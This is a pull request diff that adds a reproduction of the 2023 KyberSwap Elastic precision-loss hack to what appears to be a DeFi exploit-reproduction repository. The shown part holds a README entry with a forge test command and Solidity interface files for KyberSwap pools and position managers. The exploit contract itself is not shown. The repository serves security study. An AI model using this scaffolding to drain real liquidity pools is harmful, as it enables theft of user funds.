### PR TITLE
2023-11-22 Kyberswap elastic hack

### DIFF
--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@
 
 **Reproduce DeFi hack incidents using Foundry.**
 
-364 incidents included.
+365 incidents included.
 
 Let's make Web3 secure! Join [Discord](https://discord.gg/Fjyngakf3h)
 

--- a/README.md
+++ b/README.md
@@ -108,6 +108,8 @@ All articles are also published on [Substack](https://defihacklabs.substack.com/
 
 [20231125 TheNFTV2](#20231125-thenftv2---logic-flaw)
 
+[20231122 KyberSwap](#20231122-kyberswap---precision-loss)
+
 [20231117 Token8633_9419](#20231117-token8633_9419---price-manipulation)
 
 [20231117 ShibaToken](#20231117-shibatoken---business-logic-flaw)
@@ -1516,6 +1518,36 @@ forge test --contracts ./src/test/TheNFTV2_exp.sol -vvv
 #### Link Reference
 
 https://x.com/MetaTrustAlert/status/1728616715825848377
+
+---
+
+### 20231122 KyberSwap - precision loss
+
+### Lost: ~$48M
+
+The attacks were spread over 6 chains and 17 transactions.
+
+Each transaction targeted and drained up to 5 pools from KyberSwap elastic CLAMM.
+
+### Test
+
+All the pool hacks follow the same scheme as  the first:
+
+```
+forge test --contracts ./src/test/KyberSwap_exp.eth.1.sol -vvv
+```
+
+#### Contract
+
+[KyberSwap_exp.eth.1.sol](src/test/KyberSwap_exp.eth.1.sol)
+
+#### Link Reference
+
+[Quick analysis](https://twitter.com/BlockSecTeam/status/1727560157888942331).
+
+[In depth analysis](https://blocksec.com/blog/yet-another-tragedy-of-precision-loss-an-in-depth-analysis-of-the-kyber-swap-incident-1).
+
+[List of transactions](https://phalcon.blocksec.com/explorer/security-incidents?page=1).
 
 ---
 

--- a/src/test/KyberSwap/interfaces/IFactory.sol
+++ b/src/test/KyberSwap/interfaces/IFactory.sol
@@ -1,0 +1,165 @@
+// SPDX-License-Identifier: MIT
+pragma solidity >=0.8.0;
+
+/// @title KyberSwap v2 factory
+/// @notice Deploys KyberSwap v2 pools and manages control over government fees
+interface IFactory {
+  /// @notice Emitted when a pool is created
+  /// @param token0 First pool token by address sort order
+  /// @param token1 Second pool token by address sort order
+  /// @param swapFeeUnits Fee to be collected upon every swap in the pool, in fee units
+  /// @param tickDistance Minimum number of ticks between initialized ticks
+  /// @param pool The address of the created pool
+  event PoolCreated(
+    address indexed token0,
+    address indexed token1,
+    uint24 indexed swapFeeUnits,
+    int24 tickDistance,
+    address pool
+  );
+
+  /// @notice Emitted when a new fee is enabled for pool creation via the factory
+  /// @param swapFeeUnits Fee to be collected upon every swap in the pool, in fee units
+  /// @param tickDistance Minimum number of ticks between initialized ticks for pools created with the given fee
+  event SwapFeeEnabled(uint24 indexed swapFeeUnits, int24 indexed tickDistance);
+
+  /// @notice Emitted when vesting period changes
+  /// @param vestingPeriod The maximum time duration for which LP fees
+  /// are proportionally burnt upon LP removals
+  event VestingPeriodUpdated(uint32 vestingPeriod);
+
+  /// @notice Emitted when configMaster changes
+  /// @param oldConfigMaster configMaster before the update
+  /// @param newConfigMaster configMaster after the update
+  event ConfigMasterUpdated(address oldConfigMaster, address newConfigMaster);
+
+  /// @notice Emitted when fee configuration changes
+  /// @param feeTo Recipient of government fees
+  /// @param governmentFeeUnits Fee amount, in fee units,
+  /// to be collected out of the fee charged for a pool swap
+  event FeeConfigurationUpdated(address feeTo, uint24 governmentFeeUnits);
+
+  /// @notice Emitted when whitelist feature is enabled
+  event WhitelistEnabled();
+
+  /// @notice Emitted when whitelist feature is disabled
+  event WhitelistDisabled();
+
+  /// @notice Returns the maximum time duration for which LP fees
+  /// are proportionally burnt upon LP removals
+  function vestingPeriod() external view returns (uint32);
+
+  /// @notice Returns the tick distance for a specified fee.
+  /// @dev Once added, cannot be updated or removed.
+  /// @param swapFeeUnits Swap fee, in fee units.
+  /// @return The tick distance. Returns 0 if fee has not been added.
+  function feeAmountTickDistance(uint24 swapFeeUnits) external view returns (int24);
+
+  /// @notice Returns the address which can update the fee configuration
+  function configMaster() external view returns (address);
+
+  /// @notice Returns the keccak256 hash of the Pool creation code
+  /// This is used for pre-computation of pool addresses
+  function poolInitHash() external view returns (bytes32);
+
+  /// @notice Returns the pool oracle contract for twap
+  function poolOracle() external view returns (address);
+
+  /// @notice Fetches the recipient of government fees
+  /// and current government fee charged in fee units
+  function feeConfiguration() external view returns (address _feeTo, uint24 _governmentFeeUnits);
+
+  /// @notice Returns the status of whitelisting feature of NFT managers
+  /// If true, anyone can mint liquidity tokens
+  /// Otherwise, only whitelisted NFT manager(s) are allowed to mint liquidity tokens
+  function whitelistDisabled() external view returns (bool);
+
+  //// @notice Returns all whitelisted NFT managers
+  /// If the whitelisting feature is turned on,
+  /// only whitelisted NFT manager(s) are allowed to mint liquidity tokens
+  function getWhitelistedNFTManagers() external view returns (address[] memory);
+
+  /// @notice Checks if sender is a whitelisted NFT manager
+  /// If the whitelisting feature is turned on,
+  /// only whitelisted NFT manager(s) are allowed to mint liquidity tokens
+  /// @param sender address to be checked
+  /// @return true if sender is a whistelisted NFT manager, false otherwise
+  function isWhitelistedNFTManager(address sender) external view returns (bool);
+
+  /// @notice Returns the pool address for a given pair of tokens and a swap fee
+  /// @dev Token order does not matter
+  /// @param tokenA Contract address of either token0 or token1
+  /// @param tokenB Contract address of the other token
+  /// @param swapFeeUnits Fee to be collected upon every swap in the pool, in fee units
+  /// @return pool The pool address. Returns null address if it does not exist
+  function getPool(
+    address tokenA,
+    address tokenB,
+    uint24 swapFeeUnits
+  ) external view returns (address pool);
+
+  /// @notice Fetch parameters to be used for pool creation
+  /// @dev Called by the pool constructor to fetch the parameters of the pool
+  /// @return factory The factory address
+  /// @return poolOracle The pool oracle for twap
+  /// @return token0 First pool token by address sort order
+  /// @return token1 Second pool token by address sort order
+  /// @return swapFeeUnits Fee to be collected upon every swap in the pool, in fee units
+  /// @return tickDistance Minimum number of ticks between initialized ticks
+  function parameters()
+    external
+    view
+    returns (
+      address factory,
+      address poolOracle,
+      address token0,
+      address token1,
+      uint24 swapFeeUnits,
+      int24 tickDistance
+    );
+
+  /// @notice Creates a pool for the given two tokens and fee
+  /// @param tokenA One of the two tokens in the desired pool
+  /// @param tokenB The other of the two tokens in the desired pool
+  /// @param swapFeeUnits Desired swap fee for the pool, in fee units
+  /// @dev Token order does not matter. tickDistance is determined from the fee.
+  /// Call will revert under any of these conditions:
+  ///     1) pool already exists
+  ///     2) invalid swap fee
+  ///     3) invalid token arguments
+  /// @return pool The address of the newly created pool
+  function createPool(
+    address tokenA,
+    address tokenB,
+    uint24 swapFeeUnits
+  ) external returns (address pool);
+
+  /// @notice Enables a fee amount with the given tickDistance
+  /// @dev Fee amounts may never be removed once enabled
+  /// @param swapFeeUnits The fee amount to enable, in fee units
+  /// @param tickDistance The distance between ticks to be enforced for all pools created with the given fee amount
+  function enableSwapFee(uint24 swapFeeUnits, int24 tickDistance) external;
+
+  /// @notice Updates the address which can update the fee configuration
+  /// @dev Must be called by the current configMaster
+  function updateConfigMaster(address) external;
+
+  /// @notice Updates the vesting period
+  /// @dev Must be called by the current configMaster
+  function updateVestingPeriod(uint32) external;
+
+  /// @notice Updates the address receiving government fees and fee quantity
+  /// @dev Only configMaster is able to perform the update
+  /// @param feeTo Address to receive government fees collected from pools
+  /// @param governmentFeeUnits Fee amount, in fee units,
+  /// to be collected out of the fee charged for a pool swap
+  function updateFeeConfiguration(address feeTo, uint24 governmentFeeUnits) external;
+
+  /// @notice Enables the whitelisting feature
+  /// @dev Only configMaster is able to perform the update
+  function enableWhitelist() external;
+
+  /// @notice Disables the whitelisting feature
+  /// @dev Only configMaster is able to perform the update
+  function disableWhitelist() external;
+}

--- a/src/test/KyberSwap/interfaces/IPool.sol
+++ b/src/test/KyberSwap/interfaces/IPool.sol
@@ -1,0 +1,8 @@
+// SPDX-License-Identifier: MIT
+pragma solidity >=0.8.0;
+
+import {IPoolActions} from './pool/IPoolActions.sol';
+import {IPoolEvents} from './pool/IPoolEvents.sol';
+import {IPoolStorage} from './pool/IPoolStorage.sol';
+
+interface IPool is IPoolActions, IPoolEvents, IPoolStorage {}

--- a/src/test/KyberSwap/interfaces/oracle/IPoolOracle.sol
+++ b/src/test/KyberSwap/interfaces/oracle/IPoolOracle.sol
@@ -1,0 +1,107 @@
+// SPDX-License-Identifier: MIT
+pragma solidity >=0.8.0;
+
+interface IPoolOracle {
+  /// @notice Owner withdrew funds in the pool oracle in case some funds are stuck there
+  event OwnerWithdrew(
+    address indexed owner,
+    address indexed token,
+    uint256 indexed amount
+  );
+
+  /// @notice Emitted by the Pool Oracle for increases to the number of observations that can be stored
+  /// @dev observationCardinalityNext is not the observation cardinality until an observation is written at the index
+  /// just before a mint/swap/burn.
+  /// @param pool The pool address to update
+  /// @param observationCardinalityNextOld The previous value of the next observation cardinality
+  /// @param observationCardinalityNextNew The updated value of the next observation cardinality
+  event IncreaseObservationCardinalityNext(
+    address pool,
+    uint16 observationCardinalityNextOld,
+    uint16 observationCardinalityNextNew
+  );
+
+  /// @notice Initalize observation data for the caller.
+  function initializeOracle(uint32 time)
+    external
+    returns (uint16 cardinality, uint16 cardinalityNext);
+
+  /// @notice Write a new oracle entry into the array
+  ///   and update the observation index and cardinality
+  /// Read the Oralce.write function for more details
+  function writeNewEntry(
+    uint16 index,
+    uint32 blockTimestamp,
+    int24 tick,
+    uint128 liquidity,
+    uint16 cardinality,
+    uint16 cardinalityNext
+  )
+    external
+    returns (uint16 indexUpdated, uint16 cardinalityUpdated);
+
+  /// @notice Write a new oracle entry into the array, take the latest observaion data as inputs
+  ///   and update the observation index and cardinality
+  /// Read the Oralce.write function for more details
+  function write(
+    uint32 blockTimestamp,
+    int24 tick,
+    uint128 liquidity
+  )
+    external
+    returns (uint16 indexUpdated, uint16 cardinalityUpdated);
+
+  /// @notice Increase the maximum number of price observations that this pool will store
+  /// @dev This method is no-op if the pool already has an observationCardinalityNext greater than or equal to
+  /// the input observationCardinalityNext.
+  /// @param pool The pool address to be updated
+  /// @param observationCardinalityNext The desired minimum number of observations for the pool to store
+  function increaseObservationCardinalityNext(
+    address pool,
+    uint16 observationCardinalityNext
+  )
+    external;
+
+  /// @notice Returns the accumulator values as of each time seconds ago from the latest block time in the array of `secondsAgos`
+  /// @dev Reverts if `secondsAgos` > oldest observation
+  /// @dev It fetches the latest current tick data from the pool
+  /// Read the Oracle.observe function for more details
+  function observeFromPool(
+    address pool,
+    uint32[] memory secondsAgos
+  )
+    external view
+    returns (int56[] memory tickCumulatives);
+
+  /// @notice Returns the accumulator values as the time seconds ago from the latest block time of secondsAgo
+  /// @dev Reverts if `secondsAgo` > oldest observation
+  /// @dev It fetches the latest current tick data from the pool
+  /// Read the Oracle.observeSingle function for more details
+  function observeSingleFromPool(
+    address pool,
+    uint32 secondsAgo
+  )
+    external view
+    returns (int56 tickCumulative);
+
+  /// @notice Return the latest pool observation data given the pool address
+  function getPoolObservation(address pool)
+    external view
+    returns (bool initialized, uint16 index, uint16 cardinality, uint16 cardinalityNext);
+
+  /// @notice Returns data about a specific observation index
+  /// @param pool The pool address of the observations array to fetch
+  /// @param index The element of the observations array to fetch
+  /// @dev You most likely want to use #observe() instead of this method to get an observation as of some amount of time
+  /// ago, rather than at a specific index in the array.
+  /// @return blockTimestamp The timestamp of the observation,
+  /// Returns tickCumulative the tick multiplied by seconds elapsed for the life of the pool as of the observation timestamp,
+  /// Returns initialized whether the observation has been initialized and the values are safe to use
+  function getObservationAt(address pool, uint256 index)
+    external view
+    returns (
+      uint32 blockTimestamp,
+      int56 tickCumulative,
+      bool initialized
+    );
+}

--- a/src/test/KyberSwap/interfaces/periphery/IBasePositionManager.sol
+++ b/src/test/KyberSwap/interfaces/periphery/IBasePositionManager.sol
@@ -1,0 +1,189 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+pragma solidity >=0.8.0;
+
+import {IERC721Metadata} from '../token/ERC721/extensions/IERC721Metadata.sol';
+import {IERC721Permit} from '../token/ERC721/extensions/IERC721Permit.sol';
+import {IRouterTokenHelper} from './IRouterTokenHelper.sol';
+import {IBasePositionManagerEvents} from './base_position_manager/IBasePositionManagerEvents.sol';
+
+interface IBasePositionManager is IRouterTokenHelper, IBasePositionManagerEvents {
+  struct Position {
+    // the nonce for permits
+    uint96 nonce;
+    // the address that is approved for spending this token
+    address operator;
+    // the ID of the pool with which this token is connected
+    uint80 poolId;
+    // the tick range of the position
+    int24 tickLower;
+    int24 tickUpper;
+    // the liquidity of the position
+    uint128 liquidity;
+    // the current rToken that the position owed
+    uint256 rTokenOwed;
+    // fee growth per unit of liquidity as of the last update to liquidity
+    uint256 feeGrowthInsideLast;
+  }
+
+  struct PoolInfo {
+    address token0;
+    uint24 fee;
+    address token1;
+  }
+
+  /// @notice Params for the first time adding liquidity, mint new nft to sender
+  /// @param token0 the token0 of the pool
+  /// @param token1 the token1 of the pool
+  ///   - must make sure that token0 < token1
+  /// @param fee the pool's fee in fee units
+  /// @param tickLower the position's lower tick
+  /// @param tickUpper the position's upper tick
+  ///   - must make sure tickLower < tickUpper, and both are in tick distance
+  /// @param ticksPrevious the nearest tick that has been initialized and lower than or equal to
+  ///   the tickLower and tickUpper, use to help insert the tickLower and tickUpper if haven't initialized
+  /// @param amount0Desired the desired amount for token0
+  /// @param amount1Desired the desired amount for token1
+  /// @param amount0Min min amount of token 0 to add
+  /// @param amount1Min min amount of token 1 to add
+  /// @param recipient the owner of the position
+  /// @param deadline time that the transaction will be expired
+  struct MintParams {
+    address token0;
+    address token1;
+    uint24 fee;
+    int24 tickLower;
+    int24 tickUpper;
+    int24[2] ticksPrevious;
+    uint256 amount0Desired;
+    uint256 amount1Desired;
+    uint256 amount0Min;
+    uint256 amount1Min;
+    address recipient;
+    uint256 deadline;
+  }
+
+  /// @notice Params for adding liquidity to the existing position
+  /// @param tokenId id of the position to increase its liquidity
+  /// @param ticksPrevious the nearest tick that has been initialized and lower than or equal to
+  ///   the tickLower and tickUpper, use to help insert the tickLower and tickUpper if haven't initialized
+  ///   only needed if the position has been closed and the owner wants to add more liquidity
+  /// @param amount0Desired the desired amount for token0
+  /// @param amount1Desired the desired amount for token1
+  /// @param amount0Min min amount of token 0 to add
+  /// @param amount1Min min amount of token 1 to add
+  /// @param deadline time that the transaction will be expired
+  struct IncreaseLiquidityParams {
+    uint256 tokenId;
+    int24[2] ticksPrevious;
+    uint256 amount0Desired;
+    uint256 amount1Desired;
+    uint256 amount0Min;
+    uint256 amount1Min;
+    uint256 deadline;
+  }
+
+  /// @notice Params for remove liquidity from the existing position
+  /// @param tokenId id of the position to remove its liquidity
+  /// @param amount0Min min amount of token 0 to receive
+  /// @param amount1Min min amount of token 1 to receive
+  /// @param deadline time that the transaction will be expired
+  struct RemoveLiquidityParams {
+    uint256 tokenId;
+    uint128 liquidity;
+    uint256 amount0Min;
+    uint256 amount1Min;
+    uint256 deadline;
+  }
+
+  /// @notice Burn the rTokens to get back token0 + token1 as fees
+  /// @param tokenId id of the position to burn r token
+  /// @param amount0Min min amount of token 0 to receive
+  /// @param amount1Min min amount of token 1 to receive
+  /// @param deadline time that the transaction will be expired
+  struct BurnRTokenParams {
+    uint256 tokenId;
+    uint256 amount0Min;
+    uint256 amount1Min;
+    uint256 deadline;
+  }
+
+  /// @notice Creates a new pool if it does not exist, then unlocks if it has not been unlocked
+  /// @param token0 the token0 of the pool
+  /// @param token1 the token1 of the pool
+  /// @param fee the fee for the pool
+  /// @param currentSqrtP the initial price of the pool
+  /// @return pool returns the pool address
+  function createAndUnlockPoolIfNecessary(
+    address token0,
+    address token1,
+    uint24 fee,
+    uint160 currentSqrtP
+  ) external payable returns (address pool);
+
+  function mint(MintParams calldata params)
+    external
+    payable
+    returns (
+      uint256 tokenId,
+      uint128 liquidity,
+      uint256 amount0,
+      uint256 amount1
+    );
+
+  function addLiquidity(IncreaseLiquidityParams calldata params)
+    external
+    payable
+    returns (
+      uint128 liquidity,
+      uint256 amount0,
+      uint256 amount1,
+      uint256 additionalRTokenOwed
+    );
+
+  function removeLiquidity(RemoveLiquidityParams calldata params)
+    external
+    returns (
+      uint256 amount0,
+      uint256 amount1,
+      uint256 additionalRTokenOwed
+    );
+
+  function burnRTokens(BurnRTokenParams calldata params)
+    external
+    returns (
+      uint256 rTokenQty,
+      uint256 amount0,
+      uint256 amount1
+    );
+
+  /**
+   * @dev Burn the token by its owner
+   * @notice All liquidity should be removed before burning
+   */
+  function burn(uint256 tokenId) external payable;
+
+  function syncFeeGrowth(uint256 tokenId) external returns (uint256 additionalRTokenOwed);
+
+  function positions(uint256 tokenId)
+    external
+    view
+    returns (Position memory pos, PoolInfo memory info);
+
+  function addressToPoolId(address pool) external view returns (uint80);
+
+  function isRToken(address token) external view returns (bool);
+
+  function nextPoolId() external view returns (uint80);
+
+  function nextTokenId() external view returns (uint256);
+
+  /**
+   * @dev Returns true if this contract implements the interface defined by
+   * `interfaceId`. See the corresponding
+   * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
+   * to learn more about how these ids are created.
+   *
+   * This function call must use less than 30 000 gas.
+   */
+  function supportsInterface(bytes4 interfaceId) external view returns (bool);
+}

--- a/src/test/KyberSwap/interfaces/periphery/IRouterTokenHelper.sol
+++ b/src/test/KyberSwap/interfaces/periphery/IRouterTokenHelper.sol
@@ -1,0 +1,26 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+pragma solidity >=0.8.0;
+
+interface IRouterTokenHelper {
+  /// @notice Unwraps the contract's WETH balance and sends it to recipient as ETH.
+  /// @dev The minAmount parameter prevents malicious contracts from stealing WETH from users.
+  /// @param minAmount The minimum amount of WETH to unwrap
+  /// @param recipient The address receiving ETH
+  function unwrapWeth(uint256 minAmount, address recipient) external payable;
+
+  /// @notice Refunds any ETH balance held by this contract to the `msg.sender`
+  /// @dev Useful for bundling with mint or increase liquidity that uses ether, or exact output swaps
+  /// that use ether for the input amount
+  function refundEth() external payable;
+
+  /// @notice Transfers the full amount of a token held by this contract to recipient
+  /// @dev The minAmount parameter prevents malicious contracts from stealing the token from users
+  /// @param token The contract address of the token which will be transferred to `recipient`
+  /// @param minAmount The minimum amount of token required for a transfer
+  /// @param recipient The destination address of the token
+  function transferAllTokens(
+    address token,
+    uint256 minAmount,
+    address recipient
+  ) external payable;
+}

--- a/src/test/KyberSwap/interfaces/periphery/base_position_manager/IBasePositionManagerEvents.sol
+++ b/src/test/KyberSwap/interfaces/periphery/base_position_manager/IBasePositionManagerEvents.sol
@@ -1,0 +1,60 @@
+// SPDX-License-Identifier: MIT
+pragma solidity >=0.8.0;
+
+interface IBasePositionManagerEvents {
+  /// @notice Emitted when a token is minted for a given position
+  /// @param tokenId the newly minted tokenId
+  /// @param poolId poolId of the token
+  /// @param liquidity liquidity minted to the position range
+  /// @param amount0 token0 quantity needed to mint the liquidity
+  /// @param amount1 token1 quantity needed to mint the liquidity
+  event MintPosition(
+    uint256 indexed tokenId,
+    uint80 indexed poolId,
+    uint128 liquidity,
+    uint256 amount0,
+    uint256 amount1
+  );
+
+  /// @notice Emitted when a token is burned
+  /// @param tokenId id of the token
+  event BurnPosition(uint256 indexed tokenId);
+
+  /// @notice Emitted when add liquidity
+  /// @param tokenId id of the token
+  /// @param liquidity the increase amount of liquidity
+  /// @param amount0 token0 quantity needed to increase liquidity
+  /// @param amount1 token1 quantity needed to increase liquidity
+  /// @param additionalRTokenOwed additional rToken earned
+  event AddLiquidity(
+    uint256 indexed tokenId,
+    uint128 liquidity,
+    uint256 amount0,
+    uint256 amount1,
+    uint256 additionalRTokenOwed
+  );
+
+  /// @notice Emitted when remove liquidity
+  /// @param tokenId id of the token
+  /// @param liquidity the decease amount of liquidity
+  /// @param amount0 token0 quantity returned when remove liquidity
+  /// @param amount1 token1 quantity returned when remove liquidity
+  /// @param additionalRTokenOwed additional rToken earned
+  event RemoveLiquidity(
+    uint256 indexed tokenId,
+    uint128 liquidity,
+    uint256 amount0,
+    uint256 amount1,
+    uint256 additionalRTokenOwed
+  );
+
+  /// @notice Emitted when burn position's RToken
+  /// @param tokenId id of the token
+  /// @param rTokenBurn amount of position's RToken burnt
+  event BurnRToken(uint256 indexed tokenId, uint256 rTokenBurn);
+
+  /// @notice Emitted when sync fee growth
+  /// @param tokenId id of the token
+  /// @param additionalRTokenOwed additional rToken earned
+  event SyncFeeGrowth(uint256 indexed tokenId, uint256 additionalRTokenOwed);
+}

--- a/src/test/KyberSwap/interfaces/pool/IPoolActions.sol
+++ b/src/test/KyberSwap/interfaces/pool/IPoolActions.sol
@@ -1,0 +1,116 @@
+// SPDX-License-Identifier: MIT
+pragma solidity >=0.8.0;
+
+interface IPoolActions {
+  /// @notice Sets the initial price for the pool and seeds reinvestment liquidity
+  /// @dev Assumes the caller has sent the necessary token amounts
+  /// required for initializing reinvestment liquidity prior to calling this function
+  /// @param initialSqrtP the initial sqrt price of the pool
+  /// @param qty0 token0 quantity sent to and locked permanently in the pool
+  /// @param qty1 token1 quantity sent to and locked permanently in the pool
+  function unlockPool(uint160 initialSqrtP) external returns (uint256 qty0, uint256 qty1);
+
+  /// @notice Adds liquidity for the specified recipient/tickLower/tickUpper position
+  /// @dev Any token0 or token1 owed for the liquidity provision have to be paid for when
+  /// the IMintCallback#mintCallback is called to this method's caller
+  /// The quantity of token0/token1 to be sent depends on
+  /// tickLower, tickUpper, the amount of liquidity, and the current price of the pool.
+  /// Also sends reinvestment tokens (fees) to the recipient for any fees collected
+  /// while the position is in range
+  /// Reinvestment tokens have to be burnt via #burnRTokens in exchange for token0 and token1
+  /// @param recipient Address for which the added liquidity is credited to
+  /// @param tickLower Recipient position's lower tick
+  /// @param tickUpper Recipient position's upper tick
+  /// @param ticksPrevious The nearest tick that is initialized and <= the lower & upper ticks
+  /// @param qty Liquidity quantity to mint
+  /// @param data Data (if any) to be passed through to the callback
+  /// @return qty0 token0 quantity sent to the pool in exchange for the minted liquidity
+  /// @return qty1 token1 quantity sent to the pool in exchange for the minted liquidity
+  /// @return feeGrowthInside position's updated feeGrowthInside value
+  function mint(
+    address recipient,
+    int24 tickLower,
+    int24 tickUpper,
+    int24[2] calldata ticksPrevious,
+    uint128 qty,
+    bytes calldata data
+  )
+    external
+    returns (
+      uint256 qty0,
+      uint256 qty1,
+      uint256 feeGrowthInside
+    );
+
+  /// @notice Remove liquidity from the caller
+  /// Also sends reinvestment tokens (fees) to the caller for any fees collected
+  /// while the position is in range
+  /// Reinvestment tokens have to be burnt via #burnRTokens in exchange for token0 and token1
+  /// @param tickLower Position's lower tick for which to burn liquidity
+  /// @param tickUpper Position's upper tick for which to burn liquidity
+  /// @param qty Liquidity quantity to burn
+  /// @return qty0 token0 quantity sent to the caller
+  /// @return qty1 token1 quantity sent to the caller
+  /// @return feeGrowthInside position's updated feeGrowthInside value
+  function burn(
+    int24 tickLower,
+    int24 tickUpper,
+    uint128 qty
+  )
+    external
+    returns (
+      uint256 qty0,
+      uint256 qty1,
+      uint256 feeGrowthInside
+    );
+
+  /// @notice Burns reinvestment tokens in exchange to receive the fees collected in token0 and token1
+  /// @param qty Reinvestment token quantity to burn
+  /// @param isLogicalBurn true if burning rTokens without returning any token0/token1
+  ///         otherwise should transfer token0/token1 to sender
+  /// @return qty0 token0 quantity sent to the caller for burnt reinvestment tokens
+  /// @return qty1 token1 quantity sent to the caller for burnt reinvestment tokens
+  function burnRTokens(uint256 qty, bool isLogicalBurn)
+    external
+    returns (uint256 qty0, uint256 qty1);
+
+  /// @notice Swap token0 -> token1, or vice versa
+  /// @dev This method's caller receives a callback in the form of ISwapCallback#swapCallback
+  /// @dev swaps will execute up to limitSqrtP or swapQty is fully used
+  /// @param recipient The address to receive the swap output
+  /// @param swapQty The swap quantity, which implicitly configures the swap as exact input (>0), or exact output (<0)
+  /// @param isToken0 Whether the swapQty is specified in token0 (true) or token1 (false)
+  /// @param limitSqrtP the limit of sqrt price after swapping
+  /// could be MAX_SQRT_RATIO-1 when swapping 1 -> 0 and MIN_SQRT_RATIO+1 when swapping 0 -> 1 for no limit swap
+  /// @param data Any data to be passed through to the callback
+  /// @return qty0 Exact token0 qty sent to recipient if < 0. Minimally received quantity if > 0.
+  /// @return qty1 Exact token1 qty sent to recipient if < 0. Minimally received quantity if > 0.
+  function swap(
+    address recipient,
+    int256 swapQty,
+    bool isToken0,
+    uint160 limitSqrtP,
+    bytes calldata data
+  ) external returns (int256 qty0, int256 qty1);
+
+  /// @notice Receive token0 and/or token1 and pay it back, plus a fee, in the callback
+  /// @dev The caller of this method receives a callback in the form of IFlashCallback#flashCallback
+  /// @dev Fees collected are sent to the feeTo address if it is set in Factory
+  /// @param recipient The address which will receive the token0 and token1 quantities
+  /// @param qty0 token0 quantity to be loaned to the recipient
+  /// @param qty1 token1 quantity to be loaned to the recipient
+  /// @param data Any data to be passed through to the callback
+  function flash(
+    address recipient,
+    uint256 qty0,
+    uint256 qty1,
+    bytes calldata data
+  ) external;
+
+
+  /// @notice sync fee of position
+  /// @param tickLower Position's lower tick
+  /// @param tickUpper Position's upper tick
+  function tweakPosZeroLiq(int24 tickLower, int24 tickUpper)
+    external returns(uint256 feeGrowthInsideLast);
+}

--- a/src/test/KyberSwap/interfaces/pool/IPoolEvents.sol
+++ b/src/test/KyberSwap/interfaces/pool/IPoolEvents.sol
@@ -1,0 +1,87 @@
+// SPDX-License-Identifier: MIT
+pragma solidity >=0.8.0;
+
+interface IPoolEvents {
+  /// @notice Emitted only once per pool when #initialize is first called
+  /// @dev Mint/Burn/Swap cannot be emitted by the pool before Initialize
+  /// @param sqrtP The initial price of the pool
+  /// @param tick The initial tick of the pool
+  event Initialize(uint160 sqrtP, int24 tick);
+
+  /// @notice Emitted when liquidity is minted for a given position
+  /// @dev transfers reinvestment tokens for any collected fees earned by the position
+  /// @param sender address that minted the liquidity
+  /// @param owner address of owner of the position
+  /// @param tickLower position's lower tick
+  /// @param tickUpper position's upper tick
+  /// @param qty liquidity minted to the position range
+  /// @param qty0 token0 quantity needed to mint the liquidity
+  /// @param qty1 token1 quantity needed to mint the liquidity
+  event Mint(
+    address sender,
+    address indexed owner,
+    int24 indexed tickLower,
+    int24 indexed tickUpper,
+    uint128 qty,
+    uint256 qty0,
+    uint256 qty1
+  );
+
+  /// @notice Emitted when a position's liquidity is removed
+  /// @dev transfers reinvestment tokens for any collected fees earned by the position
+  /// @param owner address of owner of the position
+  /// @param tickLower position's lower tick
+  /// @param tickUpper position's upper tick
+  /// @param qty liquidity removed
+  /// @param qty0 token0 quantity withdrawn from removal of liquidity
+  /// @param qty1 token1 quantity withdrawn from removal of liquidity
+  event Burn(
+    address indexed owner,
+    int24 indexed tickLower,
+    int24 indexed tickUpper,
+    uint128 qty,
+    uint256 qty0,
+    uint256 qty1
+  );
+
+  /// @notice Emitted when reinvestment tokens are burnt
+  /// @param owner address which burnt the reinvestment tokens
+  /// @param qty reinvestment token quantity burnt
+  /// @param qty0 token0 quantity sent to owner for burning reinvestment tokens
+  /// @param qty1 token1 quantity sent to owner for burning reinvestment tokens
+  event BurnRTokens(address indexed owner, uint256 qty, uint256 qty0, uint256 qty1);
+
+  /// @notice Emitted for swaps by the pool between token0 and token1
+  /// @param sender Address that initiated the swap call, and that received the callback
+  /// @param recipient Address that received the swap output
+  /// @param deltaQty0 Change in pool's token0 balance
+  /// @param deltaQty1 Change in pool's token1 balance
+  /// @param sqrtP Pool's sqrt price after the swap
+  /// @param liquidity Pool's liquidity after the swap
+  /// @param currentTick Log base 1.0001 of pool's price after the swap
+  event Swap(
+    address indexed sender,
+    address indexed recipient,
+    int256 deltaQty0,
+    int256 deltaQty1,
+    uint160 sqrtP,
+    uint128 liquidity,
+    int24 currentTick
+  );
+
+  /// @notice Emitted by the pool for any flash loans of token0/token1
+  /// @param sender The address that initiated the flash loan, and that received the callback
+  /// @param recipient The address that received the flash loan quantities
+  /// @param qty0 token0 quantity loaned to the recipient
+  /// @param qty1 token1 quantity loaned to the recipient
+  /// @param paid0 token0 quantity paid for the flash, which can exceed qty0 + fee
+  /// @param paid1 token1 quantity paid for the flash, which can exceed qty0 + fee
+  event Flash(
+    address indexed sender,
+    address indexed recipient,
+    uint256 qty0,
+    uint256 qty1,
+    uint256 paid0,
+    uint256 paid1
+  );
+}

--- a/src/test/KyberSwap/interfaces/pool/IPoolStorage.sol
+++ b/src/test/KyberSwap/interfaces/pool/IPoolStorage.sol
@@ -1,0 +1,120 @@
+// SPDX-License-Identifier: MIT
+pragma solidity >=0.8.0;
+
+import {IERC20} from '../token/ERC20/IERC20.sol';
+
+import {IFactory} from '../IFactory.sol';
+import {IPoolOracle} from '../oracle/IPoolOracle.sol';
+
+interface IPoolStorage {
+  /// @notice The contract that deployed the pool, which must adhere to the IFactory interface
+  /// @return The contract address
+  function factory() external view returns (IFactory);
+
+  /// @notice The oracle contract that stores necessary data for price oracle
+  /// @return The contract address
+  function poolOracle() external view returns (IPoolOracle);
+
+  /// @notice The first of the two tokens of the pool, sorted by address
+  /// @return The token contract address
+  function token0() external view returns (IERC20);
+
+  /// @notice The second of the two tokens of the pool, sorted by address
+  /// @return The token contract address
+  function token1() external view returns (IERC20);
+
+  /// @notice The fee to be charged for a swap in basis points
+  /// @return The swap fee in basis points
+  function swapFeeUnits() external view returns (uint24);
+
+  /// @notice The pool tick distance
+  /// @dev Ticks can only be initialized and used at multiples of this value
+  /// It remains an int24 to avoid casting even though it is >= 1.
+  /// e.g: a tickDistance of 5 means ticks can be initialized every 5th tick, i.e., ..., -10, -5, 0, 5, 10, ...
+  /// @return The tick distance
+  function tickDistance() external view returns (int24);
+
+  /// @notice Maximum gross liquidity that an initialized tick can have
+  /// @dev This is to prevent overflow the pool's active base liquidity (uint128)
